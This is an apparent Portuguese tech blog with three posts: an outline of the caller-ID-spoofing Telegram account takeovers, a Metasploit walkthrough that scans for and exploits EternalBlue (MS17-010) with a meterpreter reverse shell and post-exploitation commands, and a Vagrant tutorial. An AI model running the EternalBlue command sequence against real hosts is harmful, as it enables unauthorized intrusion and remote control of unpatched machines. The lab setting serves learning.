Celular hackeado (Telegram)
23 de Janeiro de 2020, 16:42PREMISSA: TODO CONTEUDO ABAIXO SERVE APENAS PARA FINS ACADÊMICOS E ENTENDIMENTO DO QUE ACONTECEU COM O "CLONE" DA LINHA.
Celular hackeado (Telegram)
SIM Swap
Operação Spoofing
Objetivo
Acessar as contas de Telegram das vitimas
Procedimento de login
1. numero de telefone que envia um SMS vai acessar o login
2. caso falhe receber uma ligação
Acessar as caixas postais das vitimas
Ligar para seu próprio numero
Caller ID Spoofing ** esse e o cara!!! Camuflagem do remetente
-->
Manipulação de uma informação dentro da telefonia
Caller ID (identificativo de quem esta ligando)
Software VOIP
Deixar o telefone ocupado
DEIXAR CLARO QUE:
1. Falha foi das operadoras (sem senhas) acesso a caixa postal;
2. Telegram das vitimas (não acessou os dados do celular);
O que fazer para me proteger?
Ativar a autenticação de dois fatores
Varredura na Rede (para detectar o eternalblue)
16 de Janeiro de 2020, 17:37Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue.
A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado
https://www.kali.org/downloads/
Comandos dentro do Kali Linux
# service postgresql start
# msfconsole
msf5 > search smb_ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
Quando a vulnerabilidade for identificada teremos a saida
"Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86"
msf5 auxiliary(scanner/smb/smb_ms17_010) > back
msf5 > search ms17_010_eternalblue
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.0.2.15
msf5 exploit(windows/smb/ms17_010_eternalblue) > show missing
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
Pos invasão
sysinfo
getuid
shell
E por ai vai...
Lembrando que esse conteúdo serve apenas para fins acadêmicos, toda e qualquer acesso informático sem autorização É CRIME!!!
Conhecendo o Vagrant
16 de Janeiro de 2020, 10:27Site Vagrant para Download
https://www.vagrantup.com/downloads.html
Download pela própria distribuição Linux (de boa preferência eu estou usando o Debian Buster 10)
# apt-get install vagrant -y
Vagrant Box (maquinas prontas)
Criar um diretório (de sua preferência onde vai criar suas vm's)
Para instalar os boxes (Discover Vagrant Boxes)
# vagrant init centos/7 (com esse comando ele vai instalar o centOS)
Arquivo de configuração (similar ao dockerfile)
# vim Vagranfile
--parametro importante da configuração de Rede
config.vm.network (descomentar para o host receber o IP do dhcp da Rede)
config.vm.provision "shell", inline: <<-SHELL
apt-get update
apt-get install -y apache2
SHELL
# vagrant up
Como acessar a maquina
# vagrant ssh
# sudo su (se tornando root do sistema operacional)
# ip a (exibe ip da maquina)
Desligando a maquina
# vagrant halt
Eliminando a maquina
# vagrant destroy
Comandos básicos
# vagrant suspend (pausa a maquina)
# vagrant resume (retorna o estado da maquina pausada)
# vagrant destroy (destrói a maquina)
Se você gostou desse assunto leia a documentação oficial, muito boa por sinal, com isso ganhamos muito tempo para laboratórios.